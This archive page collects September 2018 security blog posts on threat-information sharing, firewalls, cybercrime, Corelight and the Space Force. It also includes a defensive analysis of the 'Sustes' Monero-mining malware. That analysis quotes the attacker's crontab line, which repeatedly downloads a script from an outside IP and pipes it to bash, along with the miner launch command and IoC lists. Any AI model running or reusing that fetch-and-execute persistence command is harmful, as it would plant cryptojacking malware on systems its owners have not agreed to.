Monthly Archives: September 2018

Shouldn’t Sharing Cyber Threat Information Be Easy?

A recent article revealed that the United States government has gotten better at providing unclassified cyber threat information to the private sector.  Law enforcement and intelligence organizations have greatly cut down the time it takes to provide unclassified versions of cyber threat indicators (a term that can reference that can refer to a variety of technical data that includes but is not limited to IP addresses, malware, e-mail addresses, etc.) to the Department of Homeland Security (DHS) to disseminate promptly to the private sector.  The process had traditionally been slow as it involves an originating agency to determine if the indicator has been properly vetted without exposing sources and methods, per the article.

 

Speed of delivering pertinent threat information is certainly an improvement in a domain where attacks occur in seconds.  A November 2017 report from the DHS Office of the Inspector General provided a report on actions taken during 2016 in fulfillment of direction mandated by the Cybersecurity Information Sharing Act of 2015 with regards to the sharing of threat indicators.  Per the report, despite successfully classifying indicators and defensive measures, it still faced challenges effectively sharing such information across the public and private sectors.  The report advocated enhanced outreach and a cross-domain information processing solution.

 

One of the steps taken to ameliorate this situation is the improvement of releasing indicators promptly may have to do with DHS’ Cyber Information Sharing Tool that was set to be updated and upgraded in 2018.  Via the automatic indicator sharing tool (a capability that enables the exchange of cyber threat indicators between the Federal Government and the private sector at machine speed), DHS is able to disseminate such information directly to those organizations that have signed up for it.  As of January 2018, more than 200 private sector and government entities had done so, though it appeared per the article that it was believed that most weren’t using the information that they received to automatically block hostile network traffic.

 

Information sharing continues to be an important endeavor between the public and private sector as such data greatly assists in the detection, mitigation, and remediation efforts of organizations.  It also is a confidence building measure to strengthen the relationship between private companies and a government that has been criticized for not doing an adequate job in cyber security. Much of this private sector outreach falls on DHS’ National Cybersecurity and Communications Integration Center (NCCIC).  Per its website, the NICCIC serves as the hub of information sharing activities for the Department to increase awareness of vulnerabilities, incidents, and mitigations. The NCCIC’s Cyber Information Sharing and Collaboration Program is the cornerstone on which the public-private information sharing rests.

 

An April 2018 report by the Government Accountability Office (GAO) found that DHS needed to enhance its efforts to improve the security of public and private sectors.  Per the GAO findings, DHS had not developed most of the planned functionality for its National Cybersecurity Protection System information-sharing capability, and moreover; “DHS did not always agree about whether notifications of potentially malicious activity had been sent or received, and agencies had mixed views about the usefulness of these notifications.”

 

It’s good to see that bureaucratic red tape is being reduced especially since cyber threats are pervasive, ongoing, and quick.  Any effort that reduces the time to get information out of the classified realm and into the hands of the private sector that has often been cited as owning approximately 85 percent of critical infrastructure, a target-rich environment that is increasingly attracting hostile actor interest.  With only 200 customers signed up to DHS, such an undertaking is destined to spin its wheels.  DHS seems to be making the right moves to improve cyber security to include the recent establishment of its new Risk Management Center.  However, what is consistently lacking is getting private sector organizations on board, a critical component of information-sharing.  While it does not appear that the private sector can be mandated to get on board, something needs to be done to get everyone on the same page whether that be an articulate communications strategy, an incentive-based program, or some combination thereof.  Regardless, DHS is demonstrating its commitment to bringing the private sector on board. When the private sector will finally accept the outstretched hand it’s been given still remains to be seen.

 

This is a guest post by Emilio Iasiello

The post Shouldn’t Sharing Cyber Threat Information Be Easy? appeared first on CyberDB.

Time to Ignite An Intellectual Spark at Microsoft Ignite 2018!

Folks,

This week, thousands of IT professionals, managers, CISOs and CIOs are in Orlando, attending, well, Microsoft Ignite 2018 !

Image Courtesy Microsoft. Source: https://www.microsoft.com/en-us/ignite

Now, according to Microsoft's website, Microsoft Ignite has SOLD OUTGreat!  There are 900+ sessions, 100+ instructor-led technology workshops, 60+ Microsoft Immersion workshops, and 50+ hands-on labs with access to expert proctors!


Did I mention that of course, Microsoft's very own experts are also going to be there, and collectively, they covered numerous vital areas such as Securing the Enterprise, Simplified IT Management, Identity‚ Access & Compliance, Enterprise Security etc.


So, with over 1000 sessions, 1000s of attendees, access to "expert proctors", and 100s of Microsoft's very own IT experts, THERE MUST BE AT LEAST ONE PERSON AT MICROSOFT IGNITE who could answer A very SIMPLE QUESTION -


       Question - What's The World's Most Important Active Directory Security Capability?



Now, in case you're wondering why anyone and in fact everyone attending Microsoft Ignite should care about this question, its because in a Microsoft Windows Server based IT Infrastructure, NOT A SINGLE ONE of the numerous vital areas listed above i.e. Securing the Enterprise, Simplified IT Management, Identity‚ Access & Compliance, Enterprise Security etc. etc. can be adequately addressed without FIRST ENSURING THE SECURITY of their foundational Active Directory deployments!


Guess what?!  I'm willing to bet that 99% of experts (let alone attendees) at Microsoft Ignite don't have a clue as to the answer!


Unbelievable, haan?! So much so for a US $ 800 Billion company's  "Sold Out"  IT Conference, where 100s of world renowned IT experts, including Microsoft's finest, were presenting, and where 1000s of IT professionals (including Domain Admins of most Fortune 100 companies) were attending, yet no one likely knows the answer to this most basic of Windows Security questions!


Er, what's that millennial lingo again? Ah yes,  OMG  LOL ROFL !

Doesn't anyone RTM today?  (They don't, and here's likely why.)


On a serious note, if anyone attending Microsoft Ignite 2018 (including Microsoft's own experts) knows the answer to this 1 question, be my guest and answer the question by leaving a comment at the end of that blog post, and you'll earn my respect.


If you don't know the answer, I highly recommend reading, one, two and three, because without knowing the answer to this 1 question (and without possessing this capability,) you cannot secure anything in an Active Directory based Windows network.


Best wishes,
Sanjay

Pardon the Absence, and Get Ready!

Folks,

Hello again. I trust this finds you all doing well. It has been a few weeks since I last blogged. I hope you'll pardon my absence.

Yes I was supposed to answer a rather important question, in fact, possibly the world's most important cyber security question, for the whole world, back in July, but I had to postpone doing so, for a few good reasons, which I may reveal in days to come.

Let's just say that amongst other things (e.g. a rather interesting trip across the Atlantic), I was working on finalising a project that directly impacts cyber security worldwide today, you know, the kind of stuff that even James Bond doesn't have yet!



By the way, speaking of Mr. Bond, as you probably know, I'm a huge fan, so thought I'd share a catchy tune with you -



Oh, that project I was working is almost over (i.e. RC1), so its time for me to get back to blogging, and...     … well, get ready!

Best wishes,
Sanjay

Pentagon CIOs struggle with legacy tech, security. Sound familiar?

Patrick Flanders has been thinking a lot about IT modernization.

Flanders, CIO of the Defense Health Agency, is gearing up to consolidate control over the Pentagon's sprawling network of treatment centers, in the process centralizing a far-flung set of IT operations that raise a host of security and device-management considerations.

"As we grow and take over management and administration of these networks and these facilities, cyber really is at the top of my list for priorities," Flanders said during a recent panel discussion hosted by Federal News Radio.

To read this article in full, please click here

Sustes Malware: CPU for Monero

Today I'd like to share a simple analysis based on fascinating threat that I like to call Sustes (you will see name genesis in a bit).

Everybody knows Monero crypto currency and probably everybody knows that it has built upon privacy, by meaning It's not that simple to figure out Monero wallet balance. Sustes (mr.sh) is a nice example of Pirate-Mining and even if it's hard to figure out its magnitude, since the attacker built-up private pool-proxies, I believe it's interesting to fix wallet address in memories and to share IoC for future Protection. So, let's have a closer look to it.

Monero stops you trying to check wallet balance
Sustes Malware doesn't infect victims by itself (it's not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget (http:\/\/192[.]99[.]142[.]226[:]8220\/mr.sh ) directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software with a bit of spicy. The following code represents the mr.sh content as a today (ref. blog post date).


An initial connection-check wants to take down unwanted software on the victim side (awk '{print $7}' | sed -e "s/\/.*//g") taking decisions upon specific IP addresses. It filters PID from connection states and it directly kills them (kill -9). The extracted attacker's unwanted communications are the following ones:
  • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
  • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
  • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
  • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
  • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
  • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
A second check comes from "command lines arguments". Sustes "greps" to search for configuration files (for example: wc.conf and wq.conf and wm.conf) then it looks for software names such as sustes (here we go !) and kills everything matches the "grep". The script follows by assigning to f2 variable the dropping website (192[.]99[.]142[.]226:8220) and later-on it calls "f2" adding specific paths (for example: /xm64 and wt.conf) in order to drop crafted components. MR.sh follows by running the dropped software with configuration file as follows:

nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &

MR.SH ends up by setting a periodic crontab action on dropping and executing itself by setting up:

crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1"

Following the analysis and extracting the configuration file from dropping URL we might observe the Monero wallet addresses and the Monero Pools used by attacker. The following wallets (W1, W2, W3) were found.

  • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
Quick analyses on the used Monero pools took me to believe the attacker built up a custom  and private (deployed on private infrastructures) monero pool/proxies, for such a reason I believe it would be nice to monitor and/or block the following addresses:
  • 158[.]69[.]133[.]20 on port 3333
  • 192[.]99[.]142[.]249 on port 3333
  • 202[.]144[.]193[.]110 on port 3333 
The downloaded payload is named sustes and it is a basic XMRIG, which is a well-known opensource miner. In this scenario it is used to make money at the expense of computer users by abusing the infected computer to mine Monero, a cryptocurrency. The following image shows the usage strings as an initial proof of software.

XMRIG prove 1

Many people are currently wondering what is the sustes process which is draining a lot of PC resources (for example: here, here and here ) .... now we have an answer: it's a unwanted Miner. :D.

Hope you had fun


IoC
  • IP Address:
    • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
    • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
    • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
    • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
    • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
    • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
  • Custom Monero Pools:
    • 158[.]69[.]133[.]20:3333
    • 192[.]99[.]142[.]249:3333
    • 202[.]144[.]193[.]110:3333 
  • Wallets:
    • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

Firewalls and the Need for Speed

I was looking for resources on campus network design and found these slides (pdf) from a 2011 Network Startup Resource Center presentation. These two caught my attention:



This bothered me, so I Tweeted about it.

This started some discussion, and prompted me to see what NSRC suggests for architecture these days. You can find the latest, from April 2018, here. Here is the bottom line for their suggested architecture:






What do you think of this architecture?

My Tweet has attracted some attention from the high speed network researcher community, some of whom assume I must be a junior security apprentice who equates "firewall" with "security." Long-time blog readers will laugh at that, like I did. So what was my problem with the original recommendation, and what problems do I have (if any) with the 2018 version?

First, let's be clear that I have always differentiated between visibility and control. A firewall is a poor visibility tool, but it is a control tool. It controls inbound or outbound activity according to its ability to perform in-line traffic inspection. This inline inspection comes at a cost, which is the major concern of those responding to my Tweet.

Notice how the presentation author thinks about firewalls. In the slides above, from the 2018 version, he says "firewalls don't protect users from getting viruses" because "clicked links while browsing" and "email attachments" are "both encrypted and firewalls won't help." Therefore, "since firewalls don't really protect users from viruses, let's focus on protecting critical server assets," because "some campuses can't develop the political backing to remove firewalls for the majority of the campus."

The author is arguing that firewalls are an inbound control mechanism, and they are ill-suited for the most prevalent threat vectors for users, in his opinion: "viruses," delivered via email attachment, or "clicked links."

Mail administrators can protect users from many malicious attachments. Desktop anti-virus can protect users from many malicious downloads delivered via "clicked links." If that is your worldview, of course firewalls are not important.

His argument for firewalls protecting servers is, implicitly, that servers may offer services that should not be exposed to the Internet. Rather than disabling those services, or limiting access via identity or local address restrictions, he says a firewall can provide that inbound control.

These arguments completely miss the point that firewalls are, in my opinion, more effective as an outbound control mechanism. For example, a firewall helps restrict adversary access to his victims when they reach outbound to establish post-exploitation command and control. This relies on the firewall identifying the attempted C2 as being malicious. To the extent intruders encrypt their C2 (and sites fail to inspect it) or use covert mechanisms (e.g., C2 over Twitter), firewalls will be less effective.

The previous argument assumes admins rely on the firewall to identify and block malicious outbound activity. Admins might alternatively identify the activity themselves, and direct the firewall to block outbound activity from designated compromised assets or to designated adversary infrastructure.

As some Twitter responders said, it's possible to do some or all of this without using a stateful firewall. I'm aware of the cool tricks one can play with routing to control traffic. Ken Meyers and I wrote about some of these approaches in 2005 in my book Extrusion Detection. See chapter 5, "Layer 3 Network Access Control."

Implementing these non-firewall-based security choices requries a high degree of diligence, which requires visibility. I did not see this emphasized in the NSRC presentation. For example:


These are fine goals, but I don't equate "manageability" with visibility or security. I don't think "problems and viruses" captures the magnitude of the threat to research networks.

The core of the reaction to my original Tweet is that I don't appreciate the need for speed in research networks. I understand that. However, I can't understand the requirement for "full bandwidth, un-filtered access to the Internet." That is a recipe for disaster.

On the other hand, if you define partner specific networks, and allow essentially site-to-site connectivity with exquisite network security monitoring methods and operations, then I do not have a problem with eliminating firewalls from the architecture. I do have a problem with unrestricted access to adversary infrastructure.

I understand that security doesn't exist to serve itself. Security exists to enable an organizational mission. Security must be a partner in network architecture design. It would be better to emphasize enhance monitoring for the networks discussed above, and think carefully about enabling speed without restrictions. The NSRC resources on the science DMZ merit consideration in this case.

Top 10 GRC mistakes — and how to avoid them

Governance, risk and compliance (GRC) — the very words cause groans among employees and leadership alike. They conjure thoughts of expansive spreadsheets and endless meetings where acronyms like KRIs and KPIs are bandied about. Quite often, GRC exercises are seen as a waste of time or the purview of the CFO and internal audit.

But this is not the case. With regulatory obligations and penalties for non-compliance increasing, CIOs and IT leadership must push for effective risk management, compliance and governance within their organizations. These efforts involve areas are separate from IT (for example, legal and finance) but are nonetheless critical for a GRC program’s effectiveness.

To read this article in full, please click here

(Insider Story)

“Your Secure DevOps Questions Answered”

  As SANS prepares for the 2nd Annual Secure DevOps Summit, Co-Chairs Frank Kim and Eric Johnson are tackling some of the common questions they get from security professionals who want to understand how to inject security into the DevOps pipeline, leverage leading DevOps practices, and secure DevOps technologies and cloud services. If you are … Continue reading Your Secure DevOps Questions Answered

State Actor Cyber Reports Overshadow the Extensive Threat of Cyber Crime

There has been recent focus on alleged Iran cyber activity the past few weeks, spurned on by the publication of a vendor report on Iranian operations.  Per the vendor’s findings, not only was Iran likely behind the activity that was targeting government and private sector in the Middle East, it was implementing National Security Agency exploits that were stolen and dumped into the public domain by the Shadow Brokers group in April 2017.  As recently as late August 2018, Iran is suspected of trying to launch influence operations ahead of the midterm elections.  The conclusion is that Iran is increasingly using asymmetric attacks, particularly via cyberspace, as part of its tool box to conduct retaliatory attacks.

The new reporting comes at a time when Russia’s cyber malfeasance has largely dominated the press, due to its influence operations efforts and election shenanigans, not just in the United States but in other countries as well.  Prior to the Russia focus, North Korea was the focal point with its suspected cyber activities targeting cryptocurrency, and the SWIFT banking transactions before that.  Iran was propelled onto the scene with Operation Ababil

DDoS attacks against U.S. banks, as well as its suspected involvement in the wiper malware incident against Saudi AramcoSome consider Iran a powerful cyber nation on par or close to it to China and Russia.  Others, maintain that Iranian actors are much less sophisticated, preferring to implement “tried-and true tactics while targeting many individuals.”  China initially led the state-led cyber espionage activity, which largely was curbed against the United States once the “no hack” pact was agreed to in 2015.

There seems to be a perpetual “revolving door” of news-cycle focus on suspected state activity, with new reports reporting on hostile espionage and exploitation occurring against global targets.  The purpose of these appears to track the latest and greatest escapades of these governments using – in most cases – publicly available tools and exploits that are publicly accessible (see Shadow Brokers above) and using vectors that for the most part are routine for any hostile cyber actor (certainly, if a state actor is “sophisticated”, the intimation is that the activity hasn’t been detected as of yet, or the sophisticated tools/exploits haven’t been implemented yet).

Between the ongoing stories of adversarial state activity as aforementioned above and news of smaller nations looking to acquire offensive cyber capabilities, all indications are that media and vendor reporting will continue to push the “hostile state actor as monolith” narrative into the public eye.  Yet, like the saying goes, “if everything is important, nothing is important,” which rings with authenticity with regards to state cyber activity.  Actual activity or incidents that threaten to disrupt, destroy, degrade, deny, or manipulate data systems or the data resident on them deserve to be pushed to the forefront as they potentially impact everyone at all levels.

But theft of intellectual property and state secrets affect a minority, and rarely if ever will impact everyday citizens.  Such vigorous scrutiny and analysis of suspected state activity should apply to the cyber crime ecosystem whose nefarious endeavors directly impact the global population.  And while there are isolated incidents of law enforcement efforts arresting groups and individuals or taking down marketplaces, this has failed to put a dent into a global industry that was cited as the second most reported economic crime, according to a 2017 report by the same vendor.

This needs to change and it would be welcome to see such vendors with a wide and deep visibility into the cyber threat space to uncover some of the more “sophisticated” state actors, to apply that precision against a threat intent on exploiting everyone on the planet.  Some of the more notable breaches have exposed a high volume of individual data:

2013/14         Yahoo                                                 3 Billion Accounts

2016               Adult Friend Finder                          412 Million Accounts

2014               eBay                                                    145 Million Users

2017               Equifax                                               143 Million User

2008               Heartland Payment Systems            134 Million credit cards

One thing is clear – cyber criminals have proven to be as sophisticated and resourceful as state actors, often times using the same tools and techniques.  The fact that this category of cyber actor is not as robustly tracked, and information shared directly to the appropriate authorities is disappointing.

 

This is a guest post by Emilio Iasiello

The post State Actor Cyber Reports Overshadow the Extensive Threat of Cyber Crime appeared first on CyberDB.

Twenty Years of Network Security Monitoring: From the AFCERT to Corelight

I am really fired up to join Corelight. I’ve had to keep my involvement with the team a secret since officially starting on July 20th. Why was I so excited about this company? Let me step backwards to help explain my present situation, and forecast the future.

Twenty years ago this month I joined the Air Force Computer Emergency Response Team (AFCERT) at then-Kelly Air Force Base, located in hot but lovely San Antonio, Texas. I was a brand new captain who thought he knew about computers and hacking based on experiences from my teenage years and more recent information operations and traditional intelligence work within the Air Intelligence Agency. I was desperate to join any part of the then-five-year-old Information Warfare Center (AFIWC) because I sensed it was the most exciting unit on “Security Hill.”

I had misjudged my presumed level of “hacking” knowledge, but I was not mistaken about the exciting life of an AFCERT intrusion detector! I quickly learned the tenets of network security monitoring, enabled by the custom software watching and logging network traffic at every Air Force base. I soon heard there were three organizations that intruders knew to be wary of in the late 1990s: the Fort, i.e. the National Security Agency; the Air Force, thanks to our Automated Security Incident Measurement (ASIM) operation; and the University of California, Berkeley, because of a professor named Vern Paxson and his Bro network security monitoring software.

When I wrote my first book in 2003-2004, The Tao of Network Security Monitoring, I enlisted the help of Christopher Jay Manders to write about Bro 0.8. Bro had the reputation of being very powerful but difficult to stand up. In 2007 I decided to try installing Bro myself, thanks to the introduction of the “brolite” scripts shipped with Bro 1.2.1. That made Bro easier to use, but I didn’t do much analysis with it until I attended the 2009 Bro hands-on workshop. There I met Vern, Robin Sommer, Seth Hall, Christian Kreibich, and other Bro users and developers. I was lost most of the class, saved only by my knowledge of standard Unix command line tools like sed, awk, and grep! I was able to integrate Bro traffic analysis and logs into my TCP/IP Weapons School 2.0 class, and subsequent versions, which I taught mainly to Black Hat students. By the time I wrote my last book, The Practice of Network Security Monitoring, in 2013, I was heavily relying on Bro logs to demonstrate many sorts of network activity, thanks to the high-fidelity nature of Bro data.

In July of this year, Seth Hall emailed to ask if I might be interested in keynoting the upcoming Bro users conference in Washington, D.C., on October 10-12. I was in a bad mood due to being unhappy with the job I had at that time, and I told him I was useless as a keynote speaker. I followed up with another message shortly after, explained my depressed mindset, and asked how he liked working at Corelight. That led to interviews with the Corelight team and a job offer. The opportunity to work with people who really understood the need for network security monitoring, and were writing the world’s most powerful software to generate NSM data, was so appealing! Now that I’m on the team, I can share how I view Corelight’s contribution to the security challenges we face.

For me, Corelight solves the problems I encountered all those years ago when I first looked at Bro. The Corelight embodiment of Bro is ready to go when you deploy it. It’s developed and maintained by the people who write the code. Furthermore, Bro is front and center, not buried behind someone else’s logo. Why buy this amazing capability from another company when you can work with those who actually conceptualize, develop, and publish the code?

It’s also not just Bro, but it’s Bro at ridiculous speeds, ingesting and making sense of complex network traffic. We regularly encounter open source Bro users who spend weeks or months struggling to get their open source deployments to run at the speeds they need, typically in the tens or hundreds of Gbps. Corelight’s offering is optimized at the hardware level to deliver the highest performance, and our team works with customers who want to push Bro to the even greater levels. 

Finally, working at Corelight gives me the chance to take NSM in many exciting new directions. For years we NSM practitioners have worried about challenges to network-centric approaches, such as encryption, cloud environments, and alert fatigue. At Corelight we are working on answers for all of these, beyond the usual approaches — SSL termination, cloud gateways, and SIEM/SOAR solutions. We will have more to say about this in the future, I’m happy to say!

What challenges do you hope Corelight can solve? Leave a comment or let me know via Twitter to @corelight_inc or @taosecurity.

Is the Space Force Necessary? If Done Correctly, Yes

Space Force picture, an independent military branch by 2020.  The move is designed to counter the weapons that China and Russia have already developed that threaten U.S. satellites.  The U.S. Vice President quickly assured that the force did not and would not be created from the ground up, but would leverage the personnel and material resources already existing in the service elements.  The goal is to streamline efforts and maximize efficiency, a noble endeavor given the difficulties that invariable arise when mission responsibilities traverse and overlap so many different organizations.

 

The protection of U.S. civilian and military space assets are considered a national security concern.  In December 2017, U.S. Department of Defense officials expressed concern that the United States’ anti-satellite capabilities were not up to par as some of its adversaries.  In contrast, adversary adoption of anti-satellite weapons been documented in the news.  In April 2018, a report detailing global counterspace capabilities (that include direct ascent weapons, co-orbital, directed energy, electronic warfare, and cyber warfare) underscores how adversarial nations are actively pursuing the development of such weapons and the threat that they pose to U.S. space interests.  The report reveals that such investment by these states started in the mid-2000s.

Take into consideration the Global Positioning System (GPS).  A break-through technology has caused perhaps an over-reliance on GPS to our detriment.  The military and civilian sectors rely on satellites for a variety of purposes that support communication, navigation, weather, tracking movement, precision weapon deployment, and the conducting of surreptitious surveillance.

 

Unsurprisingly, there is much criticism being applied to the force.  Some see the Space Force as a frivolous symbolic demonstration of U.S. power; others see the capability already existing in the Air Force’s Space Command; and still others stress the need for a cyber force instead (even after the elevation of U.S. Cyber Command to a fully functional combatant command).  What all of these criticisms have in common is that they don’t see the need for organizing U.S. space capabilities to better prepare for the threats that exist now, or more importantly, those that are coming down the road.  This sort of thinking has traditionally impacted readiness in terrorism and cyberspace.

 

Having aggressive acts move to space should not come as a surprise to the doubters.  Few thought that cyberspace would be exploited to the degree that it is now, as evidenced by how advancements in IT has evolved without security considerations being built into the technology.  And now our reality is to perpetually play catch-up in security our cyber postures, an endeavor seemingly so insurmountable that there is increasing preference to commit to using offensive cyber activity as a first line of defense and as a deterrent.  It is obvious that no one prepared well for how cyberspace could and did evolve.

 

Now apply that school of thought to space.  As states continue to develop counterspace capabilities, is it really so foolhardy to aggressively position the United States with a dedicated body to monitor and track current and future threats?  It took Cyber Command nearly a decade to become operational and staffed, truly cringe-worthy considering the speed with which attacks happen in the digital domain.  Would we want to repeat the same mistakes with space?

 

A Space Force needs to be established in the right way.  Thus far, as evidenced in the remarks made by the Vice President, consolidation and developing specific and non-overlapping roles and responsibilities is essential to ensuring that mission objectives are clear and how multiple parts work together to ensure that every goal is met.  Current stakeholders must all be brought under one roof.  There can’t be a space-dedicated office or entity in every major government body.

Anything short of that risks making another unnecessary bureaucratic entity in an over-bloated ecosystem.

 

Moreover, establishing a Space Force sends a message to our enterprising adversaries that demonstrates U.S. resolve not to be caught behind the proverbial eight-ball again.  The U.S. has the capability, material/financial/personnel resources to ensure its right to operate in space without interference.  That is important especially in the context of Russian election meddling, troll farms, and suspected Russian hacking critical infrastructures.  Critics have pointed out that the U.S. has not done enough in cyber space to demonstrate our resolve in not allowing unacceptable behavior to transpire.

 

But the U.S. doesn’t necessarily have to kinetically or non-kinetically strike an adversary to make the intended outcome.  The White House may benefit by taking a play from former U.S. President Ronald Reagan.  In the height of its nuclear arms race with the Soviets in the 1980s, the United States embarked on developing its Strategic Defense Initiative – the “Star Wars” missile defense program.  Star Wars was designed to protect the United States from attack by ballistic strategic nuclear weapons.  Competition to keep up with the United States proved too difficult, forcing Russia to offer to shrink its nuclear arsenal in exchange or Star Wars’ cancellation.

 

Is this the game plan now?  Perhaps.  The U.S. economy is strong while Russia’s has been stagnant and China’s is cooling as investment growth hits a record low.  Or it could just be the United States planning for the future.  Either way, a gambit is being played.  And now that the Space Force is official, the players are taking notice trying to figure out their next move.

This is a guest post by Emilio Iasiello

The post Is the Space Force Necessary? If Done Correctly, Yes appeared first on CyberDB.